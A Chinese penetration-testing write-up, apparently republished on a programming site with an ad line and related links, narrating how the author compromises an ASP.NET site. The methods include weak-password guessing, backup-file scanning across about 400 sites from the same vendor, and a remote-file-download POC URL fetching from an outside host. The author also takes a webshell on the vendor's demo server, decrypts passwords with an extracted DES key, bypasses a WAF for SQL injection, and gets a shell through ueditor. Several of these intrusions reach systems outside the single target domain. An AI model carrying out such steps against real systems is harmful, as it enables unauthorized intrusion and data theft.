编程代码:大神教你如何进行渗透测试
使用关键词得到目标源码
前言:对某网站进行渗透测试,此次渗透给的是一个主域名,并且也没有子域,打开了目标网站先对其进行一波信息收集
中间件: IIS 8.5
输入admin发现自动添加了/
说明其目录存在,那么盲猜一波文件,login.aspx default.aspx main.aspx 等等
最终在login.aspx下面发现后台登录页面。这不猜他一波弱口令??
一顿操作过后账号被锁
熟悉的开局,既然如此只能尝试其他方法了。
在主页的html代码中发现了某处信息
设计制作?根据后面的域名访问过去,是一个建站公司
那么,入手点来了。IIS8.5+ASP.NET+建站系统
先扫一波备份文件:
400多条ip这开发商还行。使用FOFA查询工具,批量导出
然后我们来扫一下备份文件。这里推荐我B哥的扫描器
htt删ps://gith删ub.com/broke删n5/WebAl删iveScan
可以进行批量存活扫描和目录扫描
在好几个站下面发现web.zip备份文件。
下载下来过后,对其目标站点文件进行了对比。基本一致
拿到代码开始审计多次碰壁
那么开始审计。
在某接口处放下敏感操作 WebClient.DownloadFile (远程文件下载)
由于该方法需要提供绝对路径。。比较头疼,但我跟踪相关参数。发现。
在另一个方法中调用了该方法。
并传入Server.MapPath,这根本不需要找绝对路径了系统都给你安排好了。
那么构造POC:
如果你也想成为程序员,想要快速掌握编程,赶紧关注小编加入学习企鹅圈子吧!
ash删x/api.ashx?m=do删wnloadfile&FilePath=删asmx.jpg&WebUrl=删ht删tp://***.cn/
访问地址:
文件存在,那么证明可行
回到目标地址:
被修复了文件不存在
继续回到代码中,审计其他漏洞在其他接口中,也均存在多个漏洞。如ueditor远程抓取漏洞
文件重命名可Getshell
但是这些接口都需要登录
这就很头疼了,打算在一些无需登录的接口中尝试寻找SQL注入。
最终在某处发现SQL拼接。
但是这里调用了IsSafeSqlString检测
常见符号基本被卡的死死的
拿下开发商寻找通用账号逆向加解密算法
由于都是使用了相同的建站程序,怀疑有程序内置账户
于是准备通过刚才审计出来的漏洞。从同程序的站点入手
最终在某个站点成功拿到Webshell
看了下相关信息
居然是厂商的演示站群,存了该开发商所有站点源码。
应该是在开发过程中的演示环境吧站点有很多,估计每个客户都有。
在服务器里翻到了目标站点的演示网站
根目录下有zip网站备份和sql 数据库备份。
如果说目标站点是直接搬迁过去的,那么后台账户密码应该是一样的。
将其SQL文件下载下来。再其中搜索相关信息
发现了插入账户的SQL语句。其密码是加密过的
cmd5解不开,看了下密文是33位加密。
但是登录过程中,密码是RSA加密过后传输的,而后端居然是33位的md5加密
因为有源代码,追踪了一下登录了相关方法。
密码传入后,调用了CommFun.EnPwd进行了一次加密。
追踪EnPwd方法
可以看到,传入进来的密码是RSA类型,先进行了一次RSA解密,然后进行了一次DES加密。
追踪DESEncrypt.Encrypt方法。
这里是将Encrypt方法封装了一下,并传入加密key。
其核心加密方法为下:
并且,在该类里。还定义了解密方法
得到了加密方法和解密方法以及key。那么只需要将其单独拉出来调用就可以了。
将得到加密字符进行解密,得到结果
尝试登录
忙活半天,白干了。
柳暗花明拿下目标shell
已经下午4点了。还是一无进展,准备尝试绕过SQL过滤。
就在这时候,我发现了一处SQL注入点。
某方法接收了两个参数,却只对一个参数进行了过滤。
在目标网站上测验
存在注入,发现存在waf使用垃圾参数填充成功绕过waf
直接上sqlmap安心的跑,得到系统账户以及密文
将得到的密文进行解密,得到结果
尝试登录。这下总对了吧!
终于进来了!!!!
经过之前的审计,发现了很多接口都存在漏洞,现在成功登录了。岂不是随便getshell?
直接ueditor带走。
成功shell
编程代码:大神教你如何进行渗透测试相关推荐
- linux 计算器 c语言,大神教你如何用C语言实现科学计算器
原标题:大神教你如何用C语言实现科学计算器 用C实现的科学计算器 使用C语言写的科学计算器,可以实现四则运算.三角函数运算.指对数运算:优先级正确:能智能屏蔽空格,能识别输入错误和运算错误,能实现继续 ...
- 文章如何做伪原创 SEO大神教你几招做原创网站文章的心得
想要创作出好的文章并被百度所喜欢,就非常需要SEO的优化能力,以及要对文章进行塬创或伪塬创,那么,如何做伪塬创文章?以及如何做好塬创网站文章呢?对此,本文小编就为大家带来了几招做"塬创&qu ...
- mc服务器出生地修改,《我的世界》MC出生地太坑爹怎么办?大神教你一个指令就搞定了!...
<我的世界>MC出生地太坑爹怎么办?大神教你一个指令就搞定了!在沙盒游戏<我的世界>里面,玩家们刚开始进入游戏的地方就是出生地,又叫做出生点.这些出生地是系统随机安排生成的地方 ...
- win7如何开启无线网卡服务器,大神教你win7无线网卡怎么设置wifi
wifi上网已经风靡全世界,可是电脑开启wifi是需要无线网卡的,那么win7无线网卡怎么设置wifi呢?这就有点深度了,大家都知道,小编最擅长深入浅出地教大家一些知识,今天就给大家带来大神教你win ...
- win10添加网络打印机_大神教你设置
win10系统安装打印机及驱动的详细方案
-win10使用教程...
人吃五谷杂粮会生病,电脑也一样.工作运行时间久了就会出现很多的问题,比如win10系统安装打印机及驱动这样的状况,大部分伙计都是第一次看到win10系统安装打印机及驱动这样的事情,想请高手帮忙解决wi ...
- java魔剑天使_大天使之剑大神教你打造牛逼魔剑士
大天使之剑大神教你打造牛逼魔剑士 大天使之剑哪个职业厉害?大天使之剑魔剑士怎么加点升级快?下面来看看大天使之剑大神教你打造牛逼魔剑士吧,有点长,希望对大家有帮助! 魔剑士是这个游戏升级最为快速的职业, ...
- pscc2018安装服务器无响应,强大的功能无法使用,大神教你一招解决PSCC2018无法安装扩展插件...
原标题:强大的功能无法使用,大神教你一招解决PSCC2018无法安装扩展插件 详细讲解,希望对你有所帮助. 随着Adobe大魔王把PS小公举更新到了CC 2018版本以后,各种好用的插件.滤镜.扩展功 ...
- 立刷提现显示服务器繁忙,为什么我的网页显示服务器繁忙,求大神教破除方法...
查看: 2449|回复: 12 为什么我的网页显示服务器繁忙,求大神教破除方法 当前离线UID经验22459 粮饷920 最后登录2021-8-4 在线时间1 小时 空城绝唱, 积分 22459, 距 ...
- 诺贝尔奖得主费曼大神教你如何学习
诺贝尔奖得主费曼大神教你如何学习 费曼认为我们所谓的真理就是最自然的无限逼近.因此我们之所以需要学习一些东西,正是为了要抛弃以前的谬见,或者更可能的是为了改正以前的谬见. 通俗的讲,时代在飞速发展,我 ...
最新文章
- Nginx + Spring Boot 实现负载均衡
- SringMVC从入门到源码,这一篇就够
- Multi task learning多任务学习背景简介
- 如何在xaml文件中操作用户在后台代码定义的类(1)
- 5G 信令流程 — UE 寻呼(Paging)流程
- 常见的html行级元素及语义,HTML入门之——结构,常用标签及其属性,再加上语义化...
- MOCTF-Web-我想要钱
- svn搭建本地服务端
- git相关常用基本用法命令及分支操作指南命令
- python批量读取csv并入库pg_如何通读CSV然后在Python中发布批量API调用
- 经典.net混淆器 Confuser EX 2.0 使用介绍及配置 2022
- Oracle 自带管理工具
- 推荐收藏 | 掌握这些步骤,机器学习模型问题药到病除
- 详解统计指标PV、IP、UV、VV
- 随机生成一个1 到100之间的整数,从键盘输入数字进行猜数,一共可以猜5次
- 【Day1】数组、704二分查找、27移除元素
- 显卡报价,一夜闪崩 35%
- ecshop图片自动本地化插件,ECSHOP下载商品图片,ECSHOP商品详情远程图片,ecshop商品远程图片保存,ecshop图片自动本地化插件,商品图片本地化
- linux设置简单的密码
- 网站优化---页面静态化技术